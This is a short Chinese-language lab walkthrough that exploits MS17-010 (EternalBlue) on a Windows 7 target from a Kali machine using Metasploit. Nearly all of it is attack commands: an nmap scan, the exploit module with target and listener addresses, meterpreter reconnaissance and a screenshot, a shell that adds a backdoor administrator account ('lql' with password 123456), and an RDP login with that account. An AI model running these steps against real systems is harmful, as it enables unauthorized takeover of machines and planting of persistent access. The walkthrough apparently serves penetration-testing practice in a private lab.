环境:
攻击机:kali192.168.10.2靶机:win7192.168.10.3
1.启动msf#msfconsole
2.检查msf库里是否存在ms17-010漏洞msf6>searchms17
3.扫描靶机开放端口#nmap-sV192.168.10.3
4.配置目标ip,本地ip并利用exploit进行攻击msf6>useexploit/windows/smb/ms17_010_eternalbluemsf6exploit(windows/smb/ms17_010_eternalblue)>setrhost192.168.10.3msf6exploit(windows/smb/ms17_010_eternalblue)>setlhost192.168.10.2msf6exploit(windows/smb/ms17_010_eternalblue)>exploit
5.查看靶机系统信息、用户身份并对远程主机当前屏幕截图meterpreter>sysinfometerpreter>getuidmeterpreter>screenshot
6.获得shell控制台进cmd操作,添加账户提升权限meterpreter>shellC:\Windows\system32>netuserlql123456/addC:\Windows\system32>netlocalgroupAdministratorslql/add
7.远程登录靶机#rdesktop192.168.10.3:3389
8.输入添加的账户密码,登录成功